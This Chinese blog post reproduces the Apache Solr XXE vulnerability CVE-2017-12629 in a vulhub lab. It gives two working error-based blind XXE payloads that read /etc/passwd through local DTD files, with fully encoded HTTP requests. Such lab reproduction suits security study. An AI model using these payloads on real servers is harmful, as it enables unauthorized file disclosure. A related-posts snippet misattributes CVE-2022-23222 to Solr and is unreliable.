vulhub中Apache solr XML 实体注入漏洞复现(CVE-2017-12629)

于 2024-04-01 17:37:24 发布
阅读量730 收藏 2
点赞数 3
分类专栏: vulhub漏洞复现 文章标签: apache solr xml
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yougexiaojiuguan/article/details/137239784
版权

Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629。

本环境仅测试XXE漏洞,RCE和利用链,可以在 https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE 中查看。

访问`http://your-ip:8983/`即可查看到Apache solr的管理页面,无需登录

由于返回包中不包含我们传入的XML中的信息,所以这是一个Blind XXE漏洞。但我们可以利用[Error Based XXE](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)来读取文件。

利用Error Based XXE,需要找到符合条件的dtd文件,这里提供几个思路。

1.利用fontconfig-config的fonts.dtd

openjdk的Docker镜像安装了fontconfig-config,其包含一个dtd文件符合要求:`/usr/share/xml/fontconfig/fonts.dtd`。

构造XXE Payload如下:

xml
<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">

    <!ENTITY % expr 'aaa)>
        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
        <!ELEMENT aa (bb'>

    %local_dtd;
]>
<message>any text</message>

对其编码后发送:

GET /solr/demo/select?wt=xml&defType=xmlparser&q=%3C%3Fxml%20version%3D%221%2E0%22%20%3F%3E%0A%3C%21DOCTYPE%20message%20%5B%0A%20%20%20%20%3C%21ENTITY%20%25%20local%5Fdtd%20SYSTEM%20%22file%3A%2F%2F%2Fusr%2Fshare%2Fxml%2Ffontconfig%2Ffonts%2Edtd%22%3E%0A%0A%20%20%20%20%3C%21ENTITY%20%25%20expr%20%27aaa%29%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20file%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20eval%20%22%3C%21ENTITY%20%26%23x26%3B%23x25%3B%20error%20SYSTEM%20%26%23x27%3Bfile%3A%2F%2F%2Fnonexistent%2F%26%23x25%3Bfile%3B%26%23x27%3B%3E%22%3E%0A%20%20%20%20%20%20%20%20%26%23x25%3Beval%3B%0A%20%20%20%20%20%20%20%20%26%23x25%3Berror%3B%0A%20%20%20%20%20%20%20%20%3C%21ELEMENT%20aa%20%28bb%27%3E%0A%0A%20%20%20%20%25local%5Fdtd%3B%0A%5D%3E%0A%3Cmessage%3Eany%20text%3C%2Fmessage%3E HTTP/1.1
Host: localhost.lan:8983
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Connection: close
Cache-Control: max-age=0

2.利用Jar包中的dtd文件

因为是黑盒,我们无法预测目标服务器安装的软件,利用软件内部的dtd文件会是一个更好的办法,比如Solr依赖的lucene-queryparser.jar中包含的LuceneCoreQuery.dtd。

构造XXE Payload如下:

xml
<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "jar:file:///opt/solr/server/solr-webapp/webapp/WEB-INF/lib/lucene-queryparser-7.0.1.jar!/org/apache/lucene/queryparser/xml/LuceneCoreQuery.dtd">

    <!ENTITY % queries 'aaa)>
        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
        <!ELEMENT aa (bb'>

    %local_dtd;
]>
<message>any text</message>

对其编码后发送:

GET /solr/demo/select?wt=xml&defType=xmlparser&q=%3C%3Fxml%20version%3D%221%2E0%22%20%3F%3E%0A%3C%21DOCTYPE%20message%20%5B%0A%20%20%20%20%3C%21ENTITY%20%25%20local%5Fdtd%20SYSTEM%20%22jar%3Afile%3A%2F%2F%2Fopt%2Fsolr%2Fserver%2Fsolr%2Dwebapp%2Fwebapp%2FWEB%2DINF%2Flib%2Flucene%2Dqueryparser%2D7%2E0%2E1%2Ejar%21%2Forg%2Fapache%2Flucene%2Fqueryparser%2Fxml%2FLuceneCoreQuery%2Edtd%22%3E%0A%0A%20%20%20%20%3C%21ENTITY%20%25%20queries%20%27aaa%29%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20file%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20eval%20%22%3C%21ENTITY%20%26%23x26%3B%23x25%3B%20error%20SYSTEM%20%26%23x27%3Bfile%3A%2F%2F%2Fnonexistent%2F%26%23x25%3Bfile%3B%26%23x27%3B%3E%22%3E%0A%20%20%20%20%20%20%20%20%26%23x25%3Beval%3B%0A%20%20%20%20%20%20%20%20%26%23x25%3Berror%3B%0A%20%20%20%20%20%20%20%20%3C%21ELEMENT%20aa%20%28bb%27%3E%0A%0A%20%20%20%20%25local%5Fdtd%3B%0A%5D%3E%0A%3Cmessage%3Eany%20text%3C%2Fmessage%3E HTTP/1.1
Host: localhost.lan:8983
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Connection: close
Cache-Control: max-age=0

余生有个小酒馆
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
02Apache solr XML 实体注入漏洞CVE-2017-12629
千寻的博客
03-23 1324
>漏洞复现的思路: >* 1、先构造一个站点,放置dtd文件(里面写要执行的代码), >* 2、用solr去包含这个dtd站点,就会自动读取dtd文件的文件路径
solr_exploit:Apache Solr远程代码执行突破(CVE-2019-0193)漏洞利用
03-10
此处提供的漏洞检测方法,文件等内容,均仅限于安全从业者在获得法律授权的情况下使用,目的是检测已授权的服务器的安全性。安全从业者遵守法律规定,禁止在没有得到授权的情况下做任何突破检测。 简介 理论上可以...
Apache solr XML&RCE 漏洞(CVE-2017-12629)
weixin_44047654的博客
02-22 639
Apache Solr XXE & RCE 漏洞(CVE-2017-12629)
漏洞复现Apache系列(二)之Solr漏洞复现
qq_45244158的博客
03-01 7358
漏洞复现Apache系列(二)之Solr漏洞复现
XML 外部实体 (XXE) 漏洞及其修复方法
allway2的博客
07-27 5922
PHP拥有可能是最流行的后端Web应用程序语言的称号,因此,它是攻击者的主要目标,包括XXE攻击。由于攻击者经常发现新的漏洞,因此必须保持您的PHP版本是最新的以保护您的应用程序。它们不能用于获取二进制文件,或包含类似于XML但实际上不是有效XML的代码的文件。XXE(XML外部实体注入)是一种常见的基于Web的安全漏洞,它使攻击者能够干扰Web应用程序XML数据的处理。虽然是一个常见的漏洞,但通过良好的编码实践和一些特定于语言的建议,可以轻松实现防止XXE攻击。...
XML外部实体注入总结(XXE靶机复现)
Aiwin的博客
05-15 5310
XML外部实体注入Vuln-XXE靶机复现和无回显XXE的使用
CVE-2020-13957 Apache Solr 未授权上传.md
04-13
CVE-2020-13957 Apache Solr 未授权上传
apache-solr-1.4.0.zip_apache-solr _apache-solr-1.4.0_apache-solr
09-20
在压缩包"apache-solr-1.4.0",包含了Solr的源代码、配置文件、示例文档以及其他必要的资源。对于喜欢研究Solr的人来说,这些源代码是深入理解其工作原理、定制功能以及优化性能的重要资料。通过对这些源码的研究...
Apache solr XML 实体注入漏洞CVE-2017-12629
黑白的博客
11-22 929
声明 好好学习,天天向上 漏洞描述 Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629。 影响范围 Apache Solr < 7.1 A
Apache Solr漏洞总结(比较全面的哦)
热门推荐
yangbz123的博客
06-11 1万+
目录框架概述Wiki百科百度百科漏洞列表1.远程命令执行RCE(CVE-2017-12629漏洞详情漏洞复现影响版本修复方案2.远程命令执行XXE(CVE-2017-12629漏洞详情漏洞复现影响版本修复方案3.任意文件读取AND命令执行(CVE-2019-17558)漏洞详情漏洞复现3.1代码执行3.2任意文件读取影响版本修复方案4.远程命令执行漏洞(CVE-2019-0192)漏洞详情漏洞复现影响版本修复方案5.远程命令执行漏洞(CVE-2019-0193)漏洞详情漏洞复现影响版本修复方案6.未授权
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
qq_45612828的博客
08-02 6560
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
Hacking PostgreSQL
weixin_33758863的博客
10-22 131
Hacking PostgreSQL 作者 digoal 日期 2016-10-18 标签 PostgreSQL , sql注入 , ssrf , PostgreSQL , hacking 本文为基于转载的加工文章,原文地址 http://www.cnblogs.com/Yinxinghan/p/Hacking_PostgreSQL.html ...
XXE简介
zhangpeng999123的博客
04-23 1021
1. 什么是XML xml: eXtensibleMarkup Language,可扩展标记语言,使用简单的标记来描述数据。 xml是一种非常灵活的语言,类似于HTML语言,但是并没有固定的标签,所有的标签都可以自定义,其设计的宗旨是传输数据,而不是像HTML一样显示数据。 xml不会做任何事情,它是被设计用来结构化、存储以及传输信息,也就是xml文件...
浅入深出理解XXE漏洞
Fuzz
08-21 368
一、XXE 是什么 介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞 如图所示: ​ 既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞注入的是什么?XML外部实体。(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想强调我们的利用点是 外部实体 ,也是提醒读者将注意力集
java list%3ca%3e排序_Apache Solr 远程命令+XXE执行漏洞CVE-2017-12629
weixin_32512187的博客
03-06 3523
Apache Solr 最近有出了个漏洞预警,先复习一下之前的漏洞 #命令执行 ##先创建一个listener,其设置exe的值为我们想执行的命令,args的值是命令参数POST /solr/demo/config HTTP/1.1Host: your-ipAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSI...
xxe的原理及利用
hackzkaq的博客
03-09 720
零基础学黑客,搜索公众号:白帽子左一 什么是xxe XML External Entity Injection 外部实体注入,该漏洞发生在应用程序解析XML输入时, 没有禁止外部实体的加载,导致可加载任意外部文件,造成文件读取、命令执行(有点极端)、内网端口扫描、攻击内网网站、发起dos攻击等危害。 什么是xml 一种标记语言,被设计用来传输和存储数据(html是用来显示数据): <?xml version="1.0" encoding="UTF-8"?> <person> &l
cve-2022-23222 复现
最新发布
04-28
CVE-2022-23222是一个相关于Apache Solr漏洞,恶意攻击者通过该漏洞可以导致Solr服务拒绝响应或服务断。要复现这个漏洞,需要进行以下操作: 1. 安装并配置Apache Solr服务; 2. 发送一个HTTP请求,其查询参数需要包含一个bad的特殊字符,例如'() {内网IP地址}'; 3. Solr服务将无法识别该特殊字符并将停止响应,此时攻击者便可以利用这个漏洞进行攻击。 需要注意的是,为了成功复现漏洞,需要具备一定的技术水平。同时,攻击者在进行测试时需要谨慎,以免对目标服务器造成不必要的损失。 为了避免该漏洞对系统造成影响,建议及时更新Solr服务程序,升级至最新版本。如果您发现自己的系统已经受到攻击,应立即断开与互联网的连接,并及时咨询安全专业人员解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值